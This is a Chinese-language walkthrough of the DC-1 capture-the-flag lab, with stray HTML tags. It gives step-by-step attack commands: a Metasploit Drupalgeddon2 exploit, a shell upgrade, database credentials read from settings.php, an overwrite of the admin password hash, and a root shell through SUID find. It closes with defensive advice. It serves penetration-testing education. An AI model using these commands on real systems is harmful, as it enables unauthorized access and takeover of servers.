DC-1 渗透测试实战教学文档<\/h1>

1. 环境准备与信息收集<\/h2>

1.1 靶机发现<\/h3>
已知条件：靶机操作系统为Debian Linux，Kali攻击机IP为10.10.10.6<\/li>
扫描工具：
nmap -O 10.10.10.0\/24  # 扫描目标网络并识别操作系统<\/span>
<\/span><\/span>arp-scan -l            # ARP扫描局域网主机<\/span>
<\/span><\/span>netdiscover            # 网络发现工具<\/span>
<\/span><\/span><\/code><\/pre><\/li>
确定靶机IP：10.10.10.11<\/li>
<\/ul>
1.2 端口与服务扫描<\/h3>
nmap -A -T4 10.10.10.11  # 详细扫描(-A)并使用快速扫描模式(-T4)<\/span>
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

开放22端口(SSH)<\/li>
开放80端口(HTTP)<\/li>
使用Drupal 7 CMS<\/li>
<\/ul>
2. Web应用渗透<\/h2>
2.1 初步信息收集<\/h3>

使用Wappalyzer插件识别：

CMS: Drupal 7<\/li>
PHP版本: 5.4.45<\/li>
<\/ul>
<\/li>
<\/ul>
2.2 Drupal漏洞利用<\/h3>

使用Metasploit查找Drupal 7漏洞：
msfconsole
<\/span><\/span>search drupal
<\/span><\/span><\/code><\/pre><\/li>
选择并配置漏洞利用模块：
use exploit\/unix\/webapp\/drupal_drupalgeddon2
<\/span><\/span>set RHOSTS 10.10.10.11
<\/span><\/span>set RPORT 80<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre><\/li>
成功建立meterpreter会话后获取shell：
shell
<\/span><\/span>python -c "import pty;pty.spawn('\/bin\/bash')"<\/span>  # 升级为交互式shell<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.3 Flag1获取<\/h3>

在根目录发现flag1.txt：
Every good CMS needs a config file - and so do you.
<\/code><\/pre>
<\/li>
关键点：提示查找Drupal配置文件<\/li>
<\/ul>
3. 数据库渗透<\/h2>
3.1 查找Drupal配置文件<\/h3>

默认路径：\/var\/www\/sites\/default\/settings.php<\/code><\/li>
查看内容：
cat \/var\/www\/sites\/default\/settings.php
<\/span><\/span><\/code><\/pre><\/li>
获取Flag2：
Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access).
What can you do with these credentials?
<\/code><\/pre>
<\/li>
<\/ul>
3.2 数据库凭证提取<\/h3>
从配置文件中获取：<\/p>

数据库名：drupaldb<\/li>
用户名：dbuser<\/li>
密码：R0ck3t<\/li>
<\/ul>
3.3 数据库操作<\/h3>

登录MySQL：
mysql -u dbuser -pR0ck3t drupaldb
<\/span><\/span><\/code><\/pre><\/li>
查看users表：
select<\/span> *<\/span> from<\/span> users;
<\/span><\/span><\/code><\/pre><\/li>
修改admin密码：

方法一：使用Drupal密码哈希脚本
cd \/var\/www
<\/span><\/span>php scripts\/password-hash.sh admin
<\/span><\/span><\/code><\/pre>输出哈希值：$S$DMJh3iIOftiO8OZGUwQKKA9ChRJM1qSyKd2v9VNwvqAAAoPbXn2U<\/code><\/li>
方法二：直接SQL更新
update<\/span> users set<\/span> pass=<\/span>'$S$DMJh3iIOftiO8OZGUwQKKA9ChRJM1qSyKd2v9VNwvqAAAoPbXn2U'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
3.4 Web后台登录<\/h3>

使用admin\/admin登录Drupal后台<\/li>
在"Find content"中找到Flag3：
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
<\/code><\/pre>
<\/li>
<\/ul>
4. 系统提权<\/h2>
4.1 Flag4获取<\/h3>

查看\/etc\/passwd：
cat \/etc\/passwd
<\/span><\/span><\/code><\/pre>发现flag4用户和\/home\/flag4目录<\/li>
查看flag4目录：
cd \/home\/flag4
<\/span><\/span>cat flag4.txt
<\/span><\/span><\/code><\/pre>Flag4内容：
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
<\/code><\/pre>
<\/li>
<\/ol>
4.2 提权准备<\/h3>

查找SUID权限文件：
find \/ -perm -u=<\/span>s 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现find命令具有SUID权限<\/li>
<\/ol>
4.3 利用find提权<\/h3>

方法一：
find \/ -exec '\/bin\/sh'<\/span> \;<\/span>
<\/span><\/span><\/code><\/pre><\/li>
方法二：
touch testfile
<\/span><\/span>find testfile -exec '\/bin\/sh'<\/span> \;<\/span>
<\/span><\/span><\/code><\/pre><\/li>
成功获取root shell后查看\/root目录：
cd \/root
<\/span><\/span>cat thefinalflag.txt
<\/span><\/span><\/code><\/pre>Flag5内容：
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
<\/code><\/pre>
<\/li>
<\/ol>
5. 关键知识点总结<\/h2>


信息收集<\/strong>：<\/p>

使用nmap进行主机发现和端口扫描<\/li>
Wappalyzer识别Web应用技术栈<\/li>
<\/ul>
<\/li>

漏洞利用<\/strong>：<\/p>

Metasploit框架使用<\/li>
Drupalgeddon2漏洞利用<\/li>
<\/ul>
<\/li>

数据库操作<\/strong>：<\/p>

配置文件信息提取<\/li>
MySQL凭证利用<\/li>
Drupal密码哈希机制<\/li>
<\/ul>
<\/li>

权限提升<\/strong>：<\/p>

SUID权限原理<\/li>
find命令提权技术<\/li>
Linux敏感文件(\/etc\/passwd, \/etc\/shadow)<\/li>
<\/ul>
<\/li>

工具使用<\/strong>：<\/p>

nmap<\/li>
Metasploit<\/li>
MySQL客户端<\/li>
find命令高级用法<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防御建议<\/h2>


CMS安全<\/strong>：<\/p>

及时更新CMS和插件<\/li>
修改默认配置文件路径<\/li>
使用强密码策略<\/li>
<\/ul>
<\/li>

数据库安全<\/strong>：<\/p>

避免使用默认数据库凭证<\/li>
限制数据库用户权限<\/li>
加密存储敏感信息<\/li>
<\/ul>
<\/li>

系统安全<\/strong>：<\/p>

定期检查SUID\/SGID文件<\/li>
限制root权限<\/li>
监控系统日志<\/li>
<\/ul>
<\/li>

网络防护<\/strong>：<\/p>

防火墙规则限制<\/li>
关闭不必要的服务<\/li>
SSH密钥认证替代密码认证<\/li>
<\/ul>
<\/li>
<\/ol>